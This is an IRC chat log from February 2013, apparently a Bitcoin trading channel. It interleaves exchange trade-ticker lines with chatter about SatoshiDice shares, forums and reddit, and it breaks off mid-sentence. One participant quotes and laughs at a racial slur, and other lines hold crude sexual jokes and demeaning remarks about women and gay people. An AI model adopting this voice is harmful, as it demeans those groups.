Feb 06 19:53:20 excellent Feb 06 19:53:32 2 on the way :) Feb 06 19:55:18 http://www.dailymail.co.uk/sciencetech/article-2274388/MI5-install-black-box-spy-devices-monitor-UK-internet-traffic.html#axzz2K7bdP0GW Feb 06 19:55:21 teh lolz. Feb 06 19:56:34 The UK used 1984 as a manual, go figure Feb 06 19:56:37 uk has ctv sky drones now that Feb 06 19:57:18 Kitchen knives aren't that far from being banned there and the olympic shooters may not train on british soil due to their ridiculous gun ban Feb 06 19:57:28 [MPEX] [S.MPOE] 1900 @ 0.00068818 = 1.3075 BTC [-] Feb 06 19:57:29 [MPEX] [S.MPOE] 12470 @ 0.00069155 = 8.6236 BTC [+] Feb 06 19:57:31 [MPEX] [S.MPOE] 5000 @ 0.00068409 = 3.4205 BTC [-] Feb 06 19:57:34 [MPEX] [S.MPOE] 3288 @ 0.00068408 = 2.2493 BTC [-] Feb 06 19:57:36 [MPEX] [S.MPOE] 5000 @ 0.00067943 = 3.3972 BTC [-] Feb 06 19:57:38 [MPEX] [S.MPOE] 7419 @ 0.00067941 = 5.0405 BTC [-] Feb 06 19:57:40 [MPEX] [S.MPOE] 10000 @ 0.00067939 = 6.7939 BTC [-] Feb 06 19:57:42 [MPEX] [S.MPOE] 5473 @ 0.00067938 = 3.7182 BTC [-] Feb 06 19:58:29 sorta like a sad little island by now Feb 06 19:58:45 [MPEX] [S.DICE] 500 @ 0.0064 = 3.2 BTC [+] Feb 06 19:58:46 [MPEX] [S.DICE] 10000 @ 0.00645 = 64.5 BTC [+] Feb 06 19:58:49 [MPEX] [S.DICE] 3596 @ 0.00677999 = 24.3808 BTC [+] Feb 06 20:00:52 somebody made a deposit ends in 666 Feb 06 20:01:04 i should have made this the norm! Feb 06 20:01:10 mircea_popescu: yea i saw that, that was me :) Feb 06 20:01:25 i chuckled Feb 06 20:02:01 also i regret to inform everyone that reddit goons have managed to hack mpex's hotwallet Feb 06 20:02:09 making away with the total balance of 0.00 btc Feb 06 20:02:17 reddit wins!!1eleven Feb 06 20:02:51 Reddit? Isn't that this marxist circlejerk? Feb 06 20:02:56 yeah. Feb 06 20:03:07 mpoe was trolling them earlier. Feb 06 20:03:23 and they got reallyreallyangry!!11 Feb 06 20:03:36 how did you troll them? curious Feb 06 20:03:39 meanwhile in egypt, Feb 06 20:03:40 "The inability of women in rural Egypt to clean their breasts is causing a diarrhoea epidemic, according to the country's Prime Minister Hisham Qandil." Feb 06 20:03:50 Schadenfreude http://www.reddit.com/r/Bitcoin/comments/17zq8j/because_most_people_are_idiots_in_spite_of_never/ Feb 06 20:06:55 [MPEX] [S.MPOE] 6 @ 0.00069437 = 0.0042 BTC [+] Feb 06 20:08:59 [MPEX] [S.MPOE] 7990 @ 0.00069437 = 5.548 BTC [+] Feb 06 20:09:00 [MPEX] [S.MPOE] 921 @ 0.00069607 = 0.6411 BTC [+] Feb 06 20:09:39 [MPEX] [S.MPOE] 4000 @ 0.00069258 = 2.7703 BTC [-] Feb 06 20:09:46 "Nobody counts what niggers think, and nobody counts what idiots think." HAHAHA Feb 06 20:10:25 a regular henry miller right there Feb 06 20:13:15 http://polimedia.us/dtng/c/src/136012108784.jpg with extra miller on top. Feb 06 20:14:37 Now a pornsite accepting BTC instead of the usual CC... That might be an idea Feb 06 20:14:41 [BTCTC] [S.DICE-PT] 2000 @ 0.0062 = 12.4 BTC Feb 06 20:15:07 [BTCTC] [COGNITIVE] 1 @ 0.338 BTC [+] Feb 06 20:16:54 Schadenfreude paid porn is a dead concept. Feb 06 20:17:39 I know, but it might make some publicity for BTC Feb 06 20:18:12 girls gone bitcoin went nowjhere Feb 06 20:18:30 piad blogs are the new thing Feb 06 20:18:45 i imagine top level escorts will be moving to btc only soonish Feb 06 20:18:51 seeing how they mostly fuck geeks anyway Feb 06 20:18:59 and the money trail is strictly the only way rthey can get picked up Feb 06 20:20:03 not politicans? Feb 06 20:20:22 politicians always follow whores Feb 06 20:20:25 whores lead. Feb 06 20:23:09 dammit did bitcointalk remove the 'watchlist' and 'new replies to your posts' feature?! what a stupid upgrade Feb 06 20:23:18 thats the only way i knew which threads to actually look at Feb 06 20:24:11 maybe theyve been talking with utube on how to make things worse Feb 06 20:28:13 it's part of their 3500 btc expenditure on software upgrading Feb 06 20:28:59 [MPEX] [S.MPOE] 18400 @ 0.00068425 = 12.5902 BTC [-] Feb 06 20:29:06 [MPEX] [S.MPOE] 12401 @ 0.00069639 = 8.6359 BTC [+] Feb 06 20:29:06 i still see those links Feb 06 20:29:07 [MPEX] [S.MPOE] 49 @ 0.00069925 = 0.0343 BTC [+] Feb 06 20:29:16 [BTCTC] [GSDPT] 2216 @ 0.0062 = 13.7392 BTC [-] Feb 06 20:29:43 me too Feb 06 20:30:18 [BTCTC] [GSDPT] 2000 @ 0.0062 = 12.4 BTC [-] Feb 06 20:31:12 maybe you got logged off? Feb 06 20:32:37 is whoring illegal in romania? Feb 06 20:33:20 bout the same as everywhere else. Feb 06 20:33:22 [BTCTC] [BASIC-MINING] 5 @ 0.3408 = 1.704 BTC [-] Feb 06 20:37:33 [BTCTC] [S.DICE-PT] 270 @ 0.0062 = 1.674 BTC Feb 06 20:38:01 dub ues Feb 06 20:38:02 yes it is Feb 06 20:38:59 Anduck how would you know ? Feb 06 20:39:14 i live in europe Feb 06 20:39:14 amsterdam.. Feb 06 20:39:16 i think alike Feb 06 20:39:29 its legal in netherlands, germany, uk.. Feb 06 20:39:35 most of asia Feb 06 20:39:37 mircea_popescu u know much about finland? Feb 06 20:39:42 not very much. Feb 06 20:39:46 ok Feb 06 20:39:59 most u need to know: cold. polar bears. sami people. Feb 06 20:40:05 i was there a coupla times Feb 06 20:40:09 nice skin. Feb 06 20:40:09 lol wuut Feb 06 20:40:25 where were u? Feb 06 20:40:30 northern finland or southern? Feb 06 20:40:30 legal in nevada Feb 06 20:41:00 helsinki Feb 06 20:41:01 legal in new zealand, parts of australia Feb 06 20:41:08 turku Feb 06 20:41:10 a few places Feb 06 20:41:31 dub there was some debate about legalizing it a year or two ago Feb 06 20:42:00 in sweden its legal to sell ass but not buy it Feb 06 20:42:02 meanwhile girls still work, whether it's legal or not. Feb 06 20:42:13 everywhere in europe it's ok to be a john. Feb 06 20:42:17 afaik at least. Feb 06 20:49:32 mircea_popescu: aight Feb 06 20:49:43 turku is bad Feb 06 20:49:45 but helsinki is ok Feb 06 20:52:47 [MPEX] [S.MPOE] 5000 @ 0.00067953 = 3.3977 BTC [-] Feb 06 20:52:49 [MPEX] [S.MPOE] 4321 @ 0.00067952 = 2.9362 BTC [-] Feb 06 20:52:50 [MPEX] [S.MPOE] 5579 @ 0.00067938 = 3.7903 BTC [-] Feb 06 20:55:31 [MPEX] [S.MPOE] 4321 @ 0.00068862 = 2.9755 BTC [+] Feb 06 20:55:33 [MPEX] [S.MPOE] 1429 @ 0.00068882 = 0.9843 BTC [+] Feb 06 20:59:48 [MPEX] [S.MPOE] 16350 @ 0.00068882 = 11.2622 BTC [+] Feb 06 21:00:26 [MPEX] [S.MPOE] 2121 @ 0.00068882 = 1.461 BTC [+] Feb 06 21:09:37 [MPEX] [S.MPOE] 4321 @ 0.00069916 = 3.0211 BTC [+] Feb 06 21:09:41 [MPEX] [S.MPOE] 2489 @ 0.00069917 = 1.7402 BTC [+] Feb 06 21:12:44 [BTCTC] [GSDPT] 700 @ 0.0062 = 4.34 BTC [-] Feb 06 21:15:22 [MPEX] [S.MPOE] 4321 @ 0.0006968 = 3.0109 BTC [-] Feb 06 21:15:26 [MPEX] [S.MPOE] 2217 @ 0.00069667 = 1.5445 BTC [-] Feb 06 21:15:31 [BTCTC] [GSDPT] 28 @ 0.0062 = 0.1736 BTC [-] Feb 06 21:15:37 mircea, I believe in sweden it's a-ok to be a prostitute, but their clients do get busted Feb 06 21:17:13 "Die Schweden, die haben verflucht schlechtes Geld; Wer weiß, ob der Österreicher besseres hält." Feb 06 21:18:12 mircea_popescu: can i have a handout? i am entitled to your success. Feb 06 21:18:31 sure. tell vragnaroda to disburse largesse upon you Feb 06 21:18:37 he handles all my handouts for me Feb 06 21:20:06 [MPEX] [S.MPOE] 20250 @ 0.00069667 = 14.1076 BTC [-] Feb 06 21:21:06 i miss vrag Feb 06 21:21:21 correcting my misplaced apostrophes Feb 06 21:21:38 and buttsexing rg Feb 06 21:21:54 wasn't privy to the anal Feb 06 21:22:47 so mr voorhees was wanting a "howto" video for satoshidice Feb 06 21:22:47 I heard Sweden :D Feb 06 21:22:50 So I will jump in Feb 06 21:22:59 and i had a conceptual vision i'd like share Feb 06 21:23:00 It's indeed legal to be a prostitute in Sweden Feb 06 21:23:06 but it's illegal to buy such services Feb 06 21:23:15 so the purchaser breaks the law not the provider Feb 06 21:23:18 slow pony Feb 06 21:23:28 jcpham ive been waiting for this video Feb 06 21:23:31 so a howto video for satoshidice needs firstly a dude at his computer Feb 06 21:23:41 but his voice is altered maybe he's wearing askimask Feb 06 21:23:50 and he shows how to use it real slow like Feb 06 21:23:58 maybe like the guy from delocated, kinda funny Feb 06 21:24:15 then he sends the coins and wham! Feb 06 21:24:15 annoymous huh Feb 06 21:24:19 [MPEX] [S.DICE] 2146 @ 0.0065 = 13.949 BTC [-] Feb 06 21:24:22 cut to hot chicks in bikins Feb 06 21:24:27 mansion sex Feb 06 21:24:39 gotta be informative! Feb 06 21:24:46 the winning transaction money shoit, so to speak Feb 06 21:24:54 make a video and ill tell u what to improve? Feb 06 21:24:55 maybe a little hip hop music Feb 06 21:24:59 that first scene should be a policeman, typing address with one finger Feb 06 21:25:00 big satashidice logo Feb 06 21:25:04 end commercial Feb 06 21:25:11 i will ask u questions to include or answer Feb 06 21:25:25 [HAVELOCK] [SDICE] 5 @ 0.64 = 3.2 BTC [-] Feb 06 21:25:50 the howto part is boring Feb 06 21:26:00 the whyto is much more interesting Feb 06 21:26:42 not that im with stupid but i think im ur target audience heh Feb 06 21:26:46 i can see it my head, just no time to plan and execute. film it. Feb 06 21:26:50 too much work Feb 06 21:27:09 so a howto video for satoshidice needs firstly a dude << it is illegal to show dudes. Feb 06 21:27:09 [MPEX] [S.MPOE] 4011 @ 0.00069917 = 2.8044 BTC [+] Feb 06 21:27:10 [MPEX] [S.MPOE] 4321 @ 0.00069924 = 3.0214 BTC [+] Feb 06 21:27:15 must have tits if on cam Feb 06 21:27:17 [MPEX] [S.MPOE] 12868 @ 0.00069925 = 8.9979 BTC [+] Feb 06 21:27:27 no that's what i'm saying it starts boring Feb 06 21:27:31 o o Feb 06 21:27:36 with some voice altered skimask neckbeard Feb 06 21:27:37 then she could be wearing something Feb 06 21:27:42 then cut to the txn Feb 06 21:27:48 naked hot chicks Feb 06 21:27:53 screaming satoshidice Feb 06 21:28:00 should run this on fox Feb 06 21:28:10 run it anywhere = winning Feb 06 21:28:30 i mean. a howto is going to show maybe 3 technical events Feb 06 21:28:34 he should play in on phone... on, like commuter train Feb 06 21:28:37 we dont need a movie geez Feb 06 21:28:39 sending the coins, receiving coins Feb 06 21:28:45 sad or happy Feb 06 21:28:52 might as well go over the top happy Feb 06 21:29:19 does satoshidice need to provide a bitcoin tutorial..... no Feb 06 21:29:23 that's a ridiculous idea Feb 06 21:29:34 is it Feb 06 21:29:40 i think it Feb 06 21:29:47 you do need to include how make a wallet Feb 06 21:29:51 and get coins Feb 06 21:30:02 here let me hold your hand Feb 06 21:30:06 also i think you don't need people at all in the vid Feb 06 21:30:13 just gfx Feb 06 21:30:31 [MPEX] [S.MPOE] 4990 @ 0.00069925 = 3.4893 BTC [+] Feb 06 21:30:32 [MPEX] [S.MPOE] 5975 @ 0.00069999 = 4.1824 BTC [+] Feb 06 21:30:34 [MPEX] [S.MPOE] 1335 @ 0.00069999 = 0.9345 BTC [+] Feb 06 21:30:38 thankfully i have nothing to do with this Feb 06 21:30:45 if u can edit video all u need are some talking points Feb 06 21:30:49 i'm just helping you visualize a concept Feb 06 21:31:00 and the concepts is getting bitches Feb 06 21:31:01 people want that friendly borderline cartoony childlike treatment for software help Feb 06 21:31:02 so to speak Feb 06 21:31:11 like how google does Feb 06 21:31:19 funniest thing i ever said Feb 06 21:31:21 and somewhat Apple (the music) Feb 06 21:31:40 jcpham are you saying ure in over your head Feb 06 21:32:19 i think governments would have to be involved before i'm in over my head Feb 06 21:33:23 unless someone puts up a huge wall again, I think BTC will touch $23 tomorrow Feb 06 21:34:02 he should play in on phone... on, like commuter train << related, http://polimedia.us/dtng/c/src/135336413681.jpg Feb 06 21:34:17 im wagering thats a nsfw Feb 06 21:34:21 you win. Feb 06 21:34:36 what gave it away ? Feb 06 21:34:49 its your link Feb 06 21:35:15 i dunno if nsfw... it looks like it's just anal and twat isn't visible Feb 06 21:35:28 nor boobs Feb 06 21:36:05 [MPEX] [S.MPOE] 18665 @ 0.00069999 = 13.0653 BTC [+] Feb 06 21:36:06 [MPEX] [S.MPOE] 25085 @ 0.0007 = 17.5595 BTC [+] Feb 06 21:36:47 jcpham do u have camtasia or related stuff? Feb 06 21:37:06 [MPEX] [S.MPOE] 18200 @ 0.0007 = 12.74 BTC [+] Feb 06 21:37:16 where do you work jurov ? Feb 06 21:37:21 the buttspital ? Feb 06 21:37:34 lol Feb 06 21:38:03 why? Feb 06 21:38:14 i never heard of a place of work where anal was ok. Feb 06 21:39:43 [MPEX] [S.MPOE] 4321 @ 0.00069671 = 3.0105 BTC [-] Feb 06 21:39:45 [MPEX] [S.MPOE] 8262 @ 0.00069667 = 5.7559 BTC [-] Feb 06 21:39:46 [MPEX] [S.MPOE] 317 @ 0.00068841 = 0.2182 BTC [-] Feb 06 21:41:06 oh oh uve caught the ghey? Feb 06 21:41:25 [HAVELOCK] [SDICE] 2 @ 0.67 = 1.34 BTC [+] Feb 06 21:43:59 [MPEX] [S.MPOE] 4321 @ 0.00069972 = 3.0235 BTC [+] Feb 06 21:44:06 [MPEX] [S.MPOE] 1339 @ 0.0007 = 0.9373 BTC [+] Feb 06 21:44:36 http://ux.stackexchange.com/questions/34126/how-can-users-be-prevented-from-pouring-water-into-coffee-machine-beans-compartm Feb 06 21:44:49 ^ some ppl like to exterminate idiocy Feb 06 21:45:02 others try to take it into account Feb 06 21:45:37 oh lol i found the links Feb 06 21:45:49 aparently i clicked the [-] beside the time at the top-left Feb 06 21:45:51 which hides that window Feb 06 21:45:53 I asked a facilities dude why there are locks on teh hot chotoloate feed on our machines, its to stop people putting coffee in them Feb 06 21:45:58 err top-right Feb 06 21:46:07 I had assumed poor people stealing chocolate Feb 06 21:46:16 good thing i dont drink coffee Feb 06 21:46:24 thats a major flaw Feb 06 21:46:27 yes, more for us Feb 06 21:46:28 way to go innovation Feb 06 21:46:29 The solution: mains piped coffee beans. Feb 06 21:46:41 :D Feb 06 21:47:19 hahahahaa Feb 06 21:47:46 this is hysterical. Feb 06 21:49:10 mpoe-pr sez : "ahahahaha what the fuck! cuckoo coffeemaker. you put water in the beans compartment, this wooden bird flies out, pecks you in the forehead" Feb 06 21:52:37 [MPEX] [S.MPOE] 4321 @ 0.00068858 = 2.9754 BTC [-] Feb 06 21:52:39 [MPEX] [S.MPOE] 4579 @ 0.00068841 = 3.1522 BTC [-] Feb 06 21:54:35 [MPEX] [S.MPOE] 4321 @ 0.00069021 = 2.9824 BTC [+] Feb 06 21:54:37 [MPEX] [S.MPOE] 4579 @ 0.00069033 = 3.161 BTC [+] Feb 06 21:55:53 lol theymos has no clue: https://bitcointalk.org/index.php?topic=141503.msg1508212#msg1508212 Feb 06 21:56:06 [MPEX] [S.MPOE] 1971 @ 0.00069033 = 1.3606 BTC [+] Feb 06 21:56:08 [MPEX] [S.MPOE] 3379 @ 0.00069061 = 2.3336 BTC [+] Feb 06 21:58:55 "Also, the current server seems fairly powerful. It don't know why it's so slow. I feel like it's a configuration problem somewhere." Feb 06 21:59:05 win. Feb 06 21:59:14 just adding a bet "Bitcointalk will experience major outage"... what timeframe do you suggest? Feb 06 21:59:34 [MPEX] [S.DICE] 4600 @ 0.0065 = 29.9 BTC [-] Feb 06 21:59:39 it will take more than 24 hours ... and the bet will expire in june? Feb 06 21:59:53 kinda iffy cause it can be ddosd' Feb 06 22:00:02 hm Feb 06 22:00:03 "Thanks, but I'm not confident in the security/stability of MPEx. " Feb 06 22:00:06 lmao that's sweet. Feb 06 22:00:52 or that "bitcointalk will be hacked".. hmm? Feb 06 22:01:53 somethinfg awful says this is all a ploy on his part to steal the monyz Feb 06 22:02:06 ohhh that's idea Feb 06 22:02:14 bet on how much money willbe returned Feb 06 22:02:23 i guess it'd prolly getting desperate from them. Feb 06 22:02:25 if ti will be 50% or not Feb 06 22:02:50 can be? Feb 06 22:04:46 Sure, I will sit on it for you theymos. Feb 06 22:04:48 Just let me know. Feb 06 22:06:18 [MPEX] [S.MPOE] 4121 @ 0.00069061 = 2.846 BTC [+] Feb 06 22:08:15 maybe a bitbet "will Theymos hijcack the funds by April 1" Feb 06 22:08:41 hijack Feb 06 22:08:50 that dude sublime5447 is an -otc scammer Feb 06 22:08:58 hijack as in blow on sdice? Feb 06 22:08:58 actually let me retract that Feb 06 22:09:22 it isn't proven he is a scammer he just scts scammy and he's overtly annoying Feb 06 22:10:06 "all the funds will be gone or unavailable, no longer in control of the forum to where they were donated" Feb 06 22:10:20 impossible to verify Feb 06 22:10:26 DeepBit is failing? Feb 06 22:10:39 true, impossible statement Feb 06 22:12:35 [MPEX] [S.DICE] 43074 @ 0.0065 = 279.981 BTC [-] Feb 06 22:15:42 ahhh that reddit... Feb 06 22:15:48 "a hot wallet is a wallet with a lot of btc in it" Feb 06 22:17:02 here 'hot' is synonymous with 'stolen' Feb 06 22:17:31 so mircea_popescu did you steal those btc? Feb 06 22:17:40 [MPEX] [S.MPOE] 7941 @ 0.0007 = 5.5587 BTC [+] Feb 06 22:19:12 [MPEX] [S.MPOE] 2700 @ 0.0007 = 1.89 BTC [+] Feb 06 22:19:24 [HAVELOCK] [SDICE] 3 @ 0.67 = 2.01 BTC [+] Feb 06 22:21:58 [MPEX] [S.MPOE] 3790 @ 0.00069095 = 2.6187 BTC [-] Feb 06 22:22:00 [MPEX] [S.MPOE] 5254 @ 0.00068841 = 3.6169 BTC [-] Feb 06 22:22:07 [MPEX] [S.MPOE] 4321 @ 0.00068489 = 2.9594 BTC [-] Feb 06 22:22:09 [MPEX] [S.MPOE] 3114 @ 0.00068488 = 2.1327 BTC [-] Feb 06 22:23:06 [MPEX] [S.MPOE] 4321 @ 0.000685 = 2.9599 BTC [+] Feb 06 22:23:08 [MPEX] [S.MPOE] 7822 @ 0.00068488 = 5.3571 BTC [-] Feb 06 22:23:09 [MPEX] [S.MPOE] 1514 @ 0.00067938 = 1.0286 BTC [-] Feb 06 22:24:54 [MPEX] [S.MPOE] 884 @ 0.00067938 = 0.6006 BTC [-] Feb 06 22:24:56 [MPEX] [S.MPOE] 4321 @ 0.00067934 = 2.9354 BTC [-] Feb 06 22:24:57 [MPEX] [S.MPOE] 1395 @ 0.00067933 = 0.9477 BTC [-] Feb 06 22:28:21 [MPEX] [S.DICE] 1826 @ 0.00677999 = 12.3803 BTC [+] Feb 06 22:28:25 [HAVELOCK] [SDICE] 5 @ 0.68 = 3.4 BTC [+] Feb 06 22:30:27 i didn't steal them Feb 06 22:30:47 i picked them up with my sonic the hedgehog figurine Feb 06 22:30:54 http://bossip.com/720211/jesus-take-the-wheel-brazilian-evangelical-pastor-convinced-congregation-the-holy-spirit-was-released-through-his-sacred-milk/ Feb 06 22:31:40 so easy to get lost in that site Feb 06 22:34:17 any use weexchange? Feb 06 22:35:35 i do Feb 06 22:36:01 but i don't trade there, just move btc from/to bitfunder Feb 06 22:36:29 the market depth at bitfunder is weird Feb 06 22:37:50 my god, the direct merchant auth token input doesn't even strip leading or following spaces. Feb 06 22:37:59 no wonder it didn't work first time. lame Feb 06 22:41:06 [MPEX] [S.MPOE] 3600 @ 0.00069178 = 2.4904 BTC [+] Feb 06 22:41:08 [MPEX] [S.MPOE] 1000 @ 0.00067934 = 0.6793 BTC [-] Feb 06 22:41:09 [MPEX] [S.MPOE] 5400 @ 0.00067933 = 3.6684 BTC [-] Feb 06 22:42:18 http://www.youtube.com/watch?v=h1zGqRXZlnY bitcoin related Feb 06 22:46:29 [MPEX] [S.DICE] 1050 @ 0.00650001 = 6.825 BTC [-] Feb 06 22:47:55 [MPEX] [S.DICE] 500 @ 0.00646746 = 3.2337 BTC [-] Feb 06 22:47:57 so how did evoorhees get s.dice integrated into Blockchain.info's wallet? Is he associated with Blockchain? It's quite the competitive advantage Feb 06 22:48:37 [MPEX] [S.MPOE] 4321 @ 0.00069987 = 3.0241 BTC [+] Feb 06 22:48:38 [MPEX] [S.MPOE] 7779 @ 0.00069999 = 5.4452 BTC [+] Feb 06 22:49:59 [MPEX] [S.MPOE] 4321 @ 0.00069989 = 3.0242 BTC [-] Feb 06 22:50:26 maximian, you mean the blockchain address identification? Feb 06 22:50:33 [MPEX] [S.MPOE] 4321 @ 0.00069967 = 3.0233 BTC [-] Feb 06 22:50:35 [MPEX] [S.MPOE] 5229 @ 0.00069999 = 3.6602 BTC [+] Feb 06 22:50:46 not just that, but the ability to play satoshi dice from within the block chain wallet Feb 06 22:50:53 ah so Feb 06 22:50:53 under the "Games" sidebar Feb 06 22:51:05 There's only one game available :) Feb 06 22:52:25 This why I don't think the imitators will ever catch up - evoorhees is good with partnerships and marketing, and is generally pretty ambitious Feb 06 22:52:46 [MPEX] [S.MPOE] 949 @ 0.00068631 = 0.6513 BTC [-] Feb 06 22:53:27 It's under SEND. it's always there, looking at me. Feb 06 22:53:41 yep Feb 06 22:54:21 I'll take a wild guess that he gave a piece of s.dice to the blockchain.info guy in exchange for this Feb 06 22:54:50 who is blockchain guy? Feb 06 22:54:54 dunno Feb 06 22:55:04 hello Feb 06 22:55:20 [MPEX] [S.MPOE] 21200 @ 0.00069999 = 14.8398 BTC [+] Feb 06 22:55:39 jurov: you around? Feb 06 22:55:47 yes Feb 06 22:56:41 i was wondering, do you think you may ever put a last field into the dashboard so you can have dynamically adjusting P&L, or is their an API type thing where we could link our positions to a google doc? Feb 06 22:57:40 l Feb 06 22:57:48 [MPEX] [S.MPOE] 20300 @ 0.00069999 = 14.2098 BTC [+] Feb 06 23:00:53 [BTCTC] [GSDPT] 1000 @ 0.0061 = 6.1 BTC [-] Feb 06 23:00:55 [BTCTC] [GSDPT] 324 @ 0.006 = 1.944 BTC [-] Feb 06 23:05:16 [MPEX] [S.MPOE] 5000 @ 0.00069089 = 3.4545 BTC [-] Feb 06 23:05:18 [MPEX] [S.MPOE] 4321 @ 0.00069088 = 2.9853 BTC [-] Feb 06 23:05:20 [MPEX] [S.MPOE] 9127 @ 0.00069056 = 6.3027 BTC [-] Feb 06 23:05:24 any word on next block for S.DICE? Feb 06 23:05:55 0.0062 at 10 PM EST again Feb 06 23:06:12 I kinda feel like holding out for the 5th block Feb 06 23:06:22 why? Feb 06 23:06:34 to see what price he really puts it at Feb 06 23:06:34 last night was just fun Feb 06 23:06:44 i overpayed Feb 06 23:06:48 each get a higher price according to what evoorhees said =/ Feb 06 23:06:49 but still had a blast Feb 06 23:06:57 still worth it though Feb 06 23:07:08 many people might be tapped out by the 5th block, and if erik still needs to sell the shares quickly, he might need to go lower again Feb 06 23:07:18 the market is already stabilizing close to his offer price Feb 06 23:07:48 but that could just be because most people know to wait Feb 06 23:07:56 for the blocks, rather than day trade Feb 06 23:08:00 I think people are just waiting Feb 06 23:08:00 Namworld: making another large buy tonight? hehe Feb 06 23:08:15 Ukto: no, haven't sold those I got at 0.0044 Feb 06 23:08:20 oh really? Feb 06 23:08:21 thats what i mean Feb 06 23:08:26 i thought you got some from last night too Feb 06 23:08:27 wow Feb 06 23:08:36 nope Feb 06 23:08:41 thickasthieves - no tranche will be listed for less than a prior tranche, fyi Feb 06 23:08:42 there are still shares out there to buy Feb 06 23:08:47 we have been buying abotu 25% every night Feb 06 23:08:49 Selling them at 0.0062 on BTCT.co Feb 06 23:08:53 gonna do 50% tonight Feb 06 23:08:54 good to know Feb 06 23:08:59 If I sell them, will buy more tonight Feb 06 23:09:08 hehe Feb 06 23:09:10 terra already went to bed Feb 06 23:09:24 really looking forward to end of the month Feb 06 23:09:27 see how it all goes Feb 06 23:09:28 erik, does that apply in general (as in, next month or after)? Feb 06 23:09:43 evoorhees: oh hai :P Feb 06 23:09:51 i guess that's impossible to commit to Feb 06 23:09:54 mjr_ you mean last mpex price? Feb 06 23:09:57 originally he said that referring to the 5 levels Feb 06 23:10:11 jurov: yes, last mpex price of sdice and mpoe Feb 06 23:11:05 [MPEX] [S.DICE] 1718 @ 0.0064999 = 11.1668 BTC [+] Feb 06 23:11:07 [MPEX] [S.DICE] 48950 @ 0.0065 = 318.175 BTC [+] Feb 06 23:11:25 what happens if people don't buy up the 5th tranche in a few days, does it just sit as a wall til it's bought up? Feb 06 23:11:46 so far things are working really well though, the nice spike in usd to btc along with the slight gain on sdice are putting together a very convincing image Feb 06 23:12:06 [MPEX] [O.BTCUSD.C180T] 5 @ 0.17497448 = 0.8749 BTC [+] Feb 06 23:12:18 great way to double down on BTC :) Feb 06 23:12:24 Thick, I'd think so Feb 06 23:12:25 There's only one game available :) << there's going to be more. Feb 06 23:13:05 [MPEX] [S.MPOE] 4321 @ 0.00069072 = 2.9846 BTC [+] Feb 06 23:13:07 [MPEX] [S.MPOE] 873 @ 0.00069056 = 0.6029 BTC [-] Feb 06 23:13:10 [MPEX] [S.MPOE] 1338 @ 0.00069056 = 0.924 BTC [-] Feb 06 23:13:16 [MPEX] [S.MPOE] 4226 @ 0.00069055 = 2.9183 BTC [-] Feb 06 23:14:21 mjr_ yes i've got some ideas for dashboard.. only that right now i'm working on email notifications ;) Feb 06 23:14:29 oh wow nice Feb 06 23:14:32 very cool Feb 06 23:14:32 yeah if 5th tranche doesn't sell out then it'll sit a while I guess Feb 06 23:14:53 i was thinking about what we were talking about Feb 06 23:14:58 a real trading platform Feb 06 23:15:15 with charts, live data, orders and positions in one Feb 06 23:15:21 and i think we could build something really cool Feb 06 23:15:45 if we make the backend abstract enough, everyone could use it Feb 06 23:15:52 Well there you have it Feb 06 23:18:44 [MPEX] [O.BTCUSD.C180T] 4 @ 0.17497448 = 0.6999 BTC [+] Feb 06 23:19:30 [MPEX] [S.DICE] 50000 @ 0.0065 = 325 BTC [+] Feb 06 23:19:41 mostly i think it would be a fun project to use angular.js in Feb 06 23:19:58 and that was one of the next ones i wanted to use...i really like its philosophy Feb 06 23:20:45 [MPEX] [O.BTCUSD.C210T] 1 @ 0.1 BTC [-] Feb 06 23:20:46 [MPEX] [O.BTCUSD.P210T] 1 @ 0.1 BTC [-] Feb 06 23:21:04 hmm a straddle :) Feb 06 23:21:34 lol equipriced. Feb 06 23:22:44 can't tell if short or long though Feb 06 23:23:26 if short, very interesting strategy...and not that bad really Feb 06 23:23:51 last rally it touched 21.39 then dropped and hovererd between 21 and 19 Feb 06 23:24:03 meaning this guy picked would have picked up .2 btc Feb 06 23:24:39 of course i'm assuming this was the same person playing a straddle Feb 06 23:25:11 seems likely. Feb 06 23:25:16 dudes Feb 06 23:25:23 I was just cleaning up my holdings page Feb 06 23:25:27 no strategy Feb 06 23:25:31 lol Feb 06 23:25:31 lol Feb 06 23:25:34 just get that shit out of there Feb 06 23:25:56 unfortunately the bot bids were down, so I lost .03 BTC on the play Feb 06 23:26:07 so no thoughts on where the btc usd is going? Feb 06 23:26:10 gotta file chapter 11 now Feb 06 23:26:40 [MPEX] [O.BTCUSD.C180T] 4 @ 0.1749461 = 0.6998 BTC [-] Feb 06 23:28:08 up up up Feb 06 23:28:12 the reddit page has gotten really annoying lately Feb 06 23:28:24 reddit is a terrible place, has been for years Feb 06 23:28:27 lol Feb 06 23:28:29 bring back witcoin Feb 06 23:28:31 like, I still read it Feb 06 23:28:31 its not that bad Feb 06 23:28:32 but Feb 06 23:28:35 yeah exactly Feb 06 23:28:39 up to $23 on Thurs/Fri, down to $20.50 Sat/Sun Feb 06 23:28:40 the discourse level is terribe Feb 06 23:28:40 and it has some good stuff Feb 06 23:28:51 not always, but i feel like it is getting dumbed down Feb 06 23:29:02 14,750 subscribers now on reddit Feb 06 23:29:08 they can't all be winners Feb 06 23:29:16 the only way to fix it is have a 3btc registration fee Feb 06 23:29:18 and now matthew n wright is soiling the forums again Feb 06 23:29:22 nice Feb 06 23:29:30 i wonder...can you do that on a subreddit? Feb 06 23:29:34 i was thinking an mpex subreddit Feb 06 23:29:52 that's not a bad idea Feb 06 23:29:57 and where would the money go mp? Feb 06 23:30:25 [HAVELOCK] [SDICE] 10 @ 0.689 = 6.89 BTC [+] Feb 06 23:30:26 i mean, i think it could be similar to the dynamic of #bitcoin vs #bitcoin-assets Feb 06 23:30:30 oh, a free subreddit i mean Feb 06 23:30:31 mjr_ hookers and blow. Feb 06 23:30:37 i'm in Feb 06 23:30:43 oh wait...you meant for you Feb 06 23:30:48 ;-\ Feb 06 23:30:48 no one would read the mpex subreddit based off of today's mpex link Feb 06 23:30:57 hahaha Feb 06 23:30:59 prove em right Feb 06 23:31:00 right. Feb 06 23:31:12 not only does mpex cost 30btc...the subreddit costs 3 Feb 06 23:31:21 money goes to pay moderators Feb 06 23:31:23 sounds so fucking evil Feb 06 23:31:28 but yeah, dub has a point Feb 06 23:31:36 moderation is KPI'd on user satisfaction surveys Feb 06 23:31:41 money goes to pay moderators' hookers and blow Feb 06 23:31:51 i just think it is so retarded, and i get caught up into trying to explain the diff between exchange and broker Feb 06 23:32:06 mjr_ to some 16 yo kid spazzing out... Feb 06 23:32:08 they act like everyone who wants to day trade gets a seat on NySE for free Feb 06 23:32:23 its actually 3-4 million dollars Feb 06 23:32:28 so if anything mpex is a deal Feb 06 23:32:41 how about as a 